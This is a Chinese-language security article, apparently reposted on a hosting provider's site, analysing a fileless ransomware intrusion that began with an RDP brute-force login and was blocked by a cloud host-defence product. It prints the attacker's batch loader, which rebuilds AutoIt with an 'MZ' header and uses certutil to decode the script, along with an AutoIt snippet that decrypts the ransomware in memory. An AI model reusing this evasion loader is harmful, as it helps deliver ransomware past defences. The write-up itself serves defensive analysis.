安全播报

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
一次新型无文件攻击形式的勒索病毒防御过程剖析
2020-12-01 14:18:11 【

黑客首先通过RDP暴力破解登陆客户机器,获取机器的控制权限。


云安全中心监控到两个位于拉脱维亚里加的IP:188.92.77.15和188.92.79.123 成功登陆主机。


登陆成功后,黑客远程拷贝Killer.bat恶意脚本到主机并执行,该脚本主要功能是关闭安全软件、系统服务等。


黑客开始第一次勒索攻击,植入文件名为SOS.exe的勒索病毒,运行之后被云安全中心主机防御成功拦截。


黑客发现对抗之后,开始使用load加载的免杀绕过方式,植入a.exe,这是一个使用7zip打包后的自解压exe程序,将其解压之后,释放了4个文件:cnbbrnrhi.com、kiwvyrcee.com、lozgzxher.com、qnsdpztxh.com。


其中kiwvyrcee.com是一个批处理文件:




Set byoraiood=Q


ping -n 1 wnmosszxn


<nul set /p ="MZ" > rundll32.com


type cnbbrnrhi.com >> rundll32.com


del cnbbrnrhi.com


certutil -decode lozgzxher.com Q


start /w rundll32.com Q


ping 127.0.0.1 -n 6


cnbbrnrhi.com添加"MZ"之后生成了rundll32.com,它其实是AutoIt.exe,是一个自动化的Windows界面交互的脚本语言解释器,由于本身属于合法程序,黑客可以把恶意代码藏在脚本文件中,从而灵活地执行恶意操作。


lozgzxher.com是一个开源的AutoIt解密脚本,将混淆加密后的勒索病毒qnsdpztxh.com加载到内存中解密执行。其代码执行流如下:



$in = FileOpen("qnsdpztxh.com", BitRotate(2147483648, -$GNWWRZY, "D"))

$FileData = FileRead($in)

$UncryptedData = _Crypt_DecryptData($FileData, $CryptedKey, 0)




qnsdpztxh.com解密后,发现其md5和SOS.exe勒索病毒一致,因此判断黑客尝试通过AutoIt脚本来投递二进制勒索病毒母体,还是未能绕过云安全中心主机防御。




勒索病毒准备关闭数据库等服务,被主机防御成功拦截:



勒索病毒准备加密磁盘文件,被主机防御成功拦截:



应对措施


勒索病毒对企业来说是危害极大的安全风险之一,一旦核心数据或文件被加密,除了缴纳赎金,基本上无法解密。阿里云云安全中心(主机防御)已经实现逐层递进的纵深式防御:


首先借助云上全方位的威胁情报,云安全中心实现了对大量已知勒索病毒的实时防御,在企业主机资源被病毒感染的第一时间进行拦截,避免发生文件被病毒加密而进行勒索的情况;

其次,通过放置诱饵的方式,云安全中心实时捕捉可能的勒索病毒行为,尤其针对新型未知的勒索病毒,一旦识别到有异常加密行为发生,会立刻拦截同时通知用户进行排查,进行清理;

最后,在做好对勒索病毒防御的情况下,云安全中心还支持文件备份服务,能定期对指定文件进行备份,支持按时间按文件版本恢复,在极端情况发生而导致文件被加密时,能够通过文件恢复的方式找回,做到万无一失。


】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇Microsoft Defender防病毒软件现.. 下一篇这9种方式可以绕过Web应用程序防..

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:010-56157787 ,010-56159998
企业QQ:4000043998
技术支持:010-56159998
E-Mail:800@fangyuba.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:4000043998 01056155355
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800